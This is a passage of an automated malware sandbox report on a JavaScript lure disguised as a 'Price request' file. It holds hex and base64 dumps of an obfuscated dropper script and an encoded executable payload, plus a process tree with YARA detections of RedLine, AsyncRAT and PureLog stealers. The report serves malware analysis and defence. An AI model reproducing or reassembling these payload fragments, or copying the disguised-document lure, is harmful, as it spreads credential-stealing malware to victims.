                                                2024-04-24 05:00:34 UTC913INData Raw: 78 4c 70 6c 51 4f 6e 70 45 6e 5a 41 64 54 6c 20 3d 20 22 22 20 0d 0a 53 4f 75 77 7a 41 65 79 75 46 6a 59 63 20 3d 20 31 39 31 3b 0d 0a 76 61 72 20 69 69 45 44 48 74 47 4f 46 46 65 78 67 4a 63 46 4d 20 3d 20 22 4f 68 59 73 6b 6d 62 4f 50 4c 71 6a 57 4e 49 77 65 77 50 66 4f 5a 53 22 3b 0d 0a 50 42 4e 4a 51 79 54 72 42 73 69 72 42 7a 6a 79 77 20 3d 20 31 36 3b 0d 0a 76 61 72 20 64 70 72 69 51 66 69 72 56 42 42 4d 4e 61 78 6f 50 4a 71 58 64 4b 50 77 55 6f 71 6f 56 47 77 76 79 54 42 5a 68 6b 7a 57 65 52 76 78 52 65 6f 52 6c 43 6d 71 73 62 53 53 5a 75 4e 62 6f 75 56 50 45 47 4f 20 3d 20 22 75 5a 58 48 66 4a 55 73 4d 50 53 66 71 41 5a 43 54 55 46 43 58 41 69 7a 6d 57 58 69 6b 76 67 73 4b 51 74 73 4e 76 48 67 59 6a 47 44 48 50 58 62 4f 72 43 75 7a 45 71 74 71 59
                                                Data Ascii: xLplQOnpEnZAdTl = "" SOuwzAeyuFjYc = 191;var iiEDHtGOFFexgJcFM = "OhYskmbOPLqjWNIwewPfOZS";PBNJQyTrBsirBzjyw = 16;var dpriQfirVBBMNaxoPJqXdKPwUoqoVGwvyTBZhkzWeRvxReoRlCmqsbSSZuNbouVPEGO = "uZXHfJUsMPSfqAZCTUFCXAizmWXikvgsKQtsNvHgYjGDHPXbOrCuzEqtqY
                                                2024-04-24 05:00:34 UTC14994INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 41 73 51 45 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4b 41 4e 41 67 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 73 41 45 41 68 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 47 4a 63 42 41 41 41 51 41 41 41 41 6d 41 45 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6d 52 68 64 47 45 41 41 4c 52 74 41 41 41 41 73 41 45 41 41 47 34 41 41 41 43 63 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6d 52 68 64 47 45 41 41 41 44 41 4d 41 41 41 41 43 41 43 41 41 41
                                                Data Ascii: AAAAAAAAAAAAAAAAAADAsQEAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKANAgBAAAAAAAAAAAAAAAAAsAEAhAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAGJcBAAAQAAAAmAEAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAALRtAAAAsAEAAG4AAACcAQAAAAAAAAAAAAAAAABAAABALmRhdGEAAADAMAAAACACAAA
                                                2024-04-24 05:00:34 UTC16384INData Raw: 45 41 55 31 62 2f 30 49 50 45 43 49 50 34 41 6e 51 46 67 2f 67 44 64 51 66 48 52 67 53 61 41 67 41 41 68 63 41 50 68 44 67 42 41 41 43 44 2b 41 49 50 68 43 38 42 41 41 41 37 78 58 56 57 4f 39 31 31 43 31 62 6f 77 47 34 41 41 49 50 45 42 4f 73 32 61 67 42 71 41 47 6f 41 56 75 67 50 62 67 41 41 67 38 51 51 67 2f 73 44 64 53 4b 4c 54 6b 79 4c 56 6b 51 7a 77 47 61 4a 52 45 72 2b 69 30 35 4d 6a 56 51 4a 2f 6c 4a 51 69 30 5a 45 55 4f 68 59 67 41 41 41 67 38 51 4d 69 38 66 6f 33 76 6a 2f 2f 34 4e 2f 45 41 41 50 68 50 4c 2b 2f 2f 2b 44 2b 77 51 50 68 66 44 2b 2f 2f 2b 4c 52 68 69 46 77 48 38 48 69 38 56 64 57 31 39 65 77 34 50 34 41 67 2b 46 67 51 41 41 41 49 74 57 46 49 70 48 4d 49 74 4f 43 49 67 45 45 51 46 75 46 41 2b 32 56 7a 47 4c 52 68 53 4c 54 67 69 49 46
                                                Data Ascii: EAU1b/0IPECIP4AnQFg/gDdQfHRgSaAgAAhcAPhDgBAACD+AIPhC8BAAA7xXVWO911C1bowG4AAIPEBOs2agBqAGoAVugPbgAAg8QQg/sDdSKLTkyLVkQzwGaJREr+i05MjVQJ/lJQi0ZEUOhYgAAAg8QMi8fo3vj//4N/EAAPhPL+//+D+wQPhfD+//+LRhiFwH8Hi8VdW19ew4P4Ag+FgQAAAItWFIpHMItOCIgEEQFuFA+2VzGLRhSLTgiIF
                                                2024-04-24 05:00:34 UTC16384INData Raw: 53 4e 52 43 51 51 55 46 48 2f 56 43 51 34 69 2b 69 44 78 41 69 46 37 51 2b 45 54 77 49 41 41 49 74 45 4a 42 41 50 74 68 42 41 69 55 51 6b 45 49 76 4f 30 2b 4b 4c 54 31 69 34 41 51 41 41 41 4e 50 67 69 30 39 51 41 39 71 44 78 67 68 49 49 38 4f 4c 42 49 47 4c 30 4d 48 71 43 41 2b 32 79 6b 30 37 7a 6e 65 73 71 50 41 50 68 62 6f 41 41 41 43 4c 79 4d 48 70 43 41 2b 32 30 59 6c 4d 4a 43 53 4a 56 43 51 67 44 37 62 49 41 38 71 36 41 51 41 41 41 4e 50 69 69 30 77 6b 49 49 6c 45 4a 42 7a 42 36 42 42 4b 49 39 50 54 36 67 50 51 69 30 64 51 69 77 53 51 69 38 6a 42 36 51 67 50 74 74 45 50 74 6b 77 6b 4a 41 50 52 4f 39 5a 32 61 6f 58 74 64 52 75 4c 52 43 51 30 6a 56 51 6b 45 46 4a 51 2f 31 51 6b 4f 49 76 6f 67 38 51 49 68 65 30 50 68 4b 77 42 41 41 43 4c 52 43 51 51 44
                                                Data Ascii: SNRCQQUFH/VCQ4i+iDxAiF7Q+ETwIAAItEJBAPthBAiUQkEIvO0+KLT1i4AQAAANPgi09QA9qDxghII8OLBIGL0MHqCA+2yk07znesqPAPhboAAACLyMHpCA+20YlMJCSJVCQgD7bIA8q6AQAAANPii0wkIIlEJBzB6BBKI9PT6gPQi0dQiwSQi8jB6QgPttEPtkwkJAPRO9Z2aoXtdRuLRCQ0jVQkEFJQ/1QkOIvog8QIhe0PhKwBAACLRCQQD
                                                2024-04-24 05:00:34 UTC16384INData Raw: 59 4b 41 41 41 72 33 7a 76 4c 69 58 77 6b 48 48 35 61 44 37 65 77 78 41 6f 41 41 49 76 2b 30 2b 65 4c 53 41 68 6d 43 62 69 34 46 67 41 41 44 37 61 59 75 42 59 41 41 49 74 34 46 49 67 63 4f 51 46 6f 46 41 2b 32 6d 4c 6b 57 41 41 43 4c 53 41 69 4c 65 42 53 49 48 41 2b 4c 6d 4c 77 57 41 41 41 42 61 42 53 78 45 43 72 4c 5a 74 50 75 69 30 77 6b 48 49 31 4d 43 2f 42 6d 69 62 43 34 46 67 41 41 69 33 51 6b 45 4f 73 58 5a 6f 75 34 78 41 6f 41 41 47 62 54 35 32 59 4a 75 4c 67 57 41 41 43 4c 66 43 51 63 41 38 2b 44 78 76 57 44 2b 51 6d 4a 69 4c 77 57 41 41 42 2b 55 49 76 2b 30 2b 65 4c 53 41 68 6d 43 62 69 34 46 67 41 41 44 37 61 59 75 42 59 41 41 49 74 34 46 49 67 63 4f 51 46 6f 46 41 2b 32 6d 4c 6b 57 41 41 43 4c 65 42 53 4c 53 41 69 49 48 41 2b 4c 6d 4c 77 57 41
                                                Data Ascii: YKAAAr3zvLiXwkHH5aD7ewxAoAAIv+0+eLSAhmCbi4FgAAD7aYuBYAAIt4FIgcOQFoFA+2mLkWAACLSAiLeBSIHA+LmLwWAAABaBSxECrLZtPui0wkHI1MC/BmibC4FgAAi3QkEOsXZou4xAoAAGbT52YJuLgWAACLfCQcA8+DxvWD+QmJiLwWAAB+UIv+0+eLSAhmCbi4FgAAD7aYuBYAAIt4FIgcOQFoFA+2mLkWAACLeBSLSAiIHA+LmLwWA
                                                2024-04-24 05:00:34 UTC16384INData Raw: 38 50 6c 63 41 37 78 33 55 66 36 45 33 32 2f 2f 2f 48 41 42 59 41 41 41 42 58 56 31 64 58 56 2b 6a 41 48 51 41 41 67 38 51 55 4d 38 44 70 4f 67 45 41 41 49 74 46 43 49 50 34 2f 6e 55 4e 36 43 62 32 2f 2f 2f 48 41 41 6b 41 41 41 44 72 35 44 76 48 66 41 67 37 42 56 41 2f 51 67 42 79 44 65 67 4e 39 76 2f 2f 78 77 41 4a 41 41 41 41 36 37 36 4c 30 4d 48 36 42 59 50 67 48 38 48 67 42 6f 73 55 6c 57 41 2f 51 67 41 50 76 6b 51 43 42 44 50 32 52 69 50 47 64 4e 58 72 41 55 47 41 4f 53 42 30 2b 6f 6f 42 50 47 46 30 44 44 78 79 64 42 67 38 64 77 2b 46 65 2f 2f 2f 2f 32 6f 43 57 7a 50 53 69 58 30 4d 43 78 31 34 4f 55 49 41 36 32 69 4c 33 75 76 76 4f 2f 64 30 61 67 2b 2b 77 49 50 6f 49 48 52 59 67 2b 67 4c 64 45 4b 44 36 44 64 30 45 55 68 30 4b 34 50 6f 43 33 51 58 67
                                                Data Ascii: 8PlcA7x3Uf6E32///HABYAAABXV1dXV+jAHQAAg8QUM8DpOgEAAItFCIP4/nUN6Cb2///HAAkAAADr5DvHfAg7BVA/QgByDegN9v//xwAJAAAA676L0MH6BYPgH8HgBosUlWA/QgAPvkQCBDP2RiPGdNXrAUGAOSB0+ooBPGF0DDxydBg8dw+Fe////2oCWzPSiX0MCx14OUIA62iL3uvvO/d0ag++wIPoIHRYg+gLdEKD6Dd0EUh0K4PoC3QXg
                                                2024-04-24 05:00:35 UTC16384INData Raw: 6b 41 41 41 43 44 79 50 2f 70 6e 51 41 41 41 44 50 2f 4f 38 64 38 43 44 73 46 55 44 39 43 41 48 49 68 36 45 37 47 2f 2f 2b 4a 4f 4f 67 30 78 76 2f 2f 78 77 41 4a 41 41 41 41 56 31 64 58 56 31 66 6f 70 2b 33 2f 2f 34 50 45 46 4f 76 4a 69 38 6a 42 2b 51 57 4e 48 49 31 67 50 30 49 41 69 2f 43 44 35 68 2f 42 35 67 61 4c 43 77 2b 2b 54 44 45 45 67 2b 45 42 64 4c 39 51 36 4e 46 62 41 41 42 5a 69 58 33 38 69 77 50 32 52 44 41 45 41 58 51 57 2f 33 55 51 2f 33 55 4d 2f 33 55 49 36 43 37 34 2f 2f 2b 44 78 41 79 4a 52 65 54 72 46 75 6a 52 78 66 2f 2f 78 77 41 4a 41 41 41 41 36 4e 6e 46 2f 2f 2b 4a 4f 49 4e 4e 35 50 2f 48 52 66 7a 2b 2f 2f 2f 2f 36 41 6b 41 41 41 43 4c 52 65 54 6f 43 4f 6a 2f 2f 38 50 2f 64 51 6a 6f 47 31 77 41 41 46 6e 44 69 2f 39 56 69 2b 79 4c 52
                                                Data Ascii: kAAACDyP/pnQAAADP/O8d8CDsFUD9CAHIh6E7G//+JOOg0xv//xwAJAAAAV1dXV1fop+3//4PEFOvJi8jB+QWNHI1gP0IAi/CD5h/B5gaLCw++TDEEg+EBdL9Q6NFbAABZiX38iwP2RDAEAXQW/3UQ/3UM/3UI6C74//+DxAyJReTrFujRxf//xwAJAAAA6NnF//+JOINN5P/HRfz+////6AkAAACLReToCOj//8P/dQjoG1wAAFnDi/9Vi+yLR
                                                2024-04-24 05:00:35 UTC16384INData Raw: 79 44 2b 41 4a 30 42 44 76 44 64 59 4c 2f 46 51 53 78 51 51 43 4c 38 44 76 7a 44 34 52 79 2f 2f 2f 2f 4f 42 35 30 43 6b 41 34 47 48 58 37 51 44 67 59 64 66 59 72 78 6b 42 51 69 55 58 34 36 4e 72 79 2f 2f 2b 4c 2b 46 6b 37 2b 33 55 4d 56 76 38 56 41 4c 46 42 41 4f 6c 46 2f 2f 2f 2f 2f 33 58 34 56 6c 66 6f 6d 49 6e 2f 2f 34 50 45 44 46 62 2f 46 51 43 78 51 51 43 4c 78 31 39 65 57 38 6e 44 69 2f 39 57 75 47 41 50 51 67 43 2b 59 41 39 43 41 46 65 4c 2b 44 76 47 63 77 2b 4c 42 34 58 41 64 41 4c 2f 30 49 50 48 42 44 76 2b 63 76 46 66 58 73 4f 4c 2f 31 61 34 61 41 39 43 41 4c 35 6f 44 30 49 41 56 34 76 34 4f 38 5a 7a 44 34 73 48 68 63 42 30 41 76 2f 51 67 38 63 45 4f 2f 35 79 38 56 39 65 77 34 76 2f 56 59 76 73 67 2b 77 51 6f 54 51 69 51 67 43 44 5a 66 67 41 67
                                                Data Ascii: yD+AJ0BDvDdYL/FQSxQQCL8DvzD4Ry////OB50CkA4GHX7QDgYdfYrxkBQiUX46Nry//+L+Fk7+3UMVv8VALFBAOlF/////3X4VlfomIn//4PEDFb/FQCxQQCLx19eW8nDi/9WuGAPQgC+YA9CAFeL+DvGcw+LB4XAdAL/0IPHBDv+cvFfXsOL/1a4aA9CAL5oD0IAV4v4O8ZzD4sHhcB0Av/Qg8cEO/5y8V9ew4v/VYvsg+wQoTQiQgCDZfgAg
                                                2024-04-24 05:00:35 UTC16384INData Raw: 74 33 4c 4f 68 53 5a 76 2f 2f 61 69 4a 65 55 31 4e 54 55 31 4f 4a 4d 4f 6a 47 6a 66 2f 2f 67 38 51 55 4f 46 33 38 44 34 52 35 2f 2f 2f 2f 69 30 58 34 67 32 42 77 2f 65 6c 74 2f 2f 2f 2f 69 41 61 4c 52 51 67 37 77 33 51 47 78 77 41 42 41 41 41 41 4f 46 33 38 44 34 51 6c 2f 2f 2f 2f 69 30 58 34 67 32 42 77 2f 65 6b 5a 2f 2f 2f 2f 6a 55 30 4d 55 56 4e 58 56 6d 6f 42 6a 55 30 55 55 56 4f 4a 58 51 7a 2f 63 41 54 2f 46 62 79 77 51 51 41 37 77 33 51 55 4f 56 30 4d 44 34 56 65 2f 2f 2f 2f 69 30 30 49 4f 38 74 30 76 59 6b 42 36 37 6e 2f 46 51 53 77 51 51 43 44 2b 48 6f 50 68 55 54 2f 2f 2f 38 37 38 77 2b 45 5a 2f 2f 2f 2f 7a 76 37 44 34 5a 66 2f 2f 2f 2f 56 31 4e 57 36 42 31 67 2f 2f 2b 44 78 41 7a 70 54 2f 2f 2f 2f 34 76 2f 56 59 76 73 61 67 44 2f 64 52 54 2f 64
                                                Data Ascii: t3LOhSZv//aiJeU1NTU1OJMOjGjf//g8QUOF38D4R5////i0X4g2Bw/elt////iAaLRQg7w3QGxwABAAAAOF38D4Ql////i0X4g2Bw/ekZ////jU0MUVNXVmoBjU0UUVOJXQz/cAT/FbywQQA7w3QUOV0MD4Ve////i00IO8t0vYkB67n/FQSwQQCD+HoPhUT///878w+EZ////zv7D4Zf////V1NW6B1g//+DxAzpT////4v/VYvsagD/dRT/d
                                                2024-04-24 05:00:35 UTC477INData Raw: 73 7a 69 38 34 6a 7a 34 6c 4e 38 49 76 4b 30 2b 36 4c 54 66 77 4c 64 66 53 4a 4d 34 74 31 38 4e 50 6d 2f 30 55 49 67 33 30 49 41 34 6c 31 39 48 7a 54 69 2f 42 71 41 73 48 6d 41 6f 31 4e 36 46 6f 72 7a 6a 76 51 66 41 69 4c 4d 59 6c 30 6c 65 44 72 42 59 4e 6b 6c 65 41 41 53 6f 50 70 42 49 58 53 66 65 65 4c 4e 58 67 77 51 67 42 4f 6a 55 34 42 69 38 47 5a 67 2b 49 66 41 38 4c 42 2b 41 57 4c 30 59 48 69 48 77 41 41 67 49 6c 46 39 48 6b 46 53 6f 50 4b 34 45 4a 71 48 31 6b 72 79 6a 50 53 51 74 50 69 6a 56 79 46 34 49 6c 4e 38 49 55 54 44 34 53 43 41 41 41 41 67 38 72 2f 30 2b 4c 33 30 6f 56 55 68 65 44 72 42 59 4e 38 68 65 41 41 64 51 68 41 67 2f 67 44 66 50 50 72 5a 6f 76 47 6d 57 6f 66 57 53 50 52 41 38 4c 42 2b 41 57 42 35 68 38 41 41 49 42 35 42 55 36 44 7a
                                                Data Ascii: szi84jz4lN8IvK0+6LTfwLdfSJM4t18NPm/0UIg30IA4l19HzTi/BqAsHmAo1N6ForzjvQfAiLMYl0leDrBYNkleAASoPpBIXSfeeLNXgwQgBOjU4Bi8GZg+IfA8LB+AWL0YHiHwAAgIlF9HkFSoPK4EJqH1kryjPSQtPijVyF4IlN8IUTD4SCAAAAg8r/0+L30oVUheDrBYN8heAAdQhAg/gDfPPrZovGmWofWSPRA8LB+AWB5h8AAIB5BU6Dz


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:07:00:29
                                                Start date:24/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js"
                                                Imagebase:0x7ff6faa70000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:07:00:34
                                                Start date:24/04/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js"
                                                Imagebase:0x7ff6faa70000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1404488524.0000027D83ED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:07:00:34
                                                Start date:24/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\NaE.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\NaE.exe"
                                                Imagebase:0x400000
                                                File size:212'480 bytes
                                                MD5 hash:E05EDADFDDE523064F35BA05A09B55D5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1461555095.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 75%, ReversingLabs
                                                • Detection: 62%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:07:00:40
                                                Start date:24/04/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
                                                Imagebase:0xa40000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:07:00:40
                                                Start date:24/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6ee680000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:07:00:40
                                                Start date:24/04/2024
                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                Wow64 process (32bit):true
                                                Commandline:timeout 3
                                                Imagebase:0xc10000
                                                File size:25'088 bytes
                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:07:00:43
                                                Start date:24/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\audio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\audio.exe"
                                                Imagebase:0x400000
                                                File size:212'480 bytes
                                                MD5 hash:E05EDADFDDE523064F35BA05A09B55D5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2645719105.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 75%, ReversingLabs
                                                • Detection: 62%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:10
                                                Start time:07:00:49
                                                Start date:24/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\audio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\audio.exe"
                                                Imagebase:0x400000
                                                File size:212'480 bytes
                                                MD5 hash:E05EDADFDDE523064F35BA05A09B55D5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
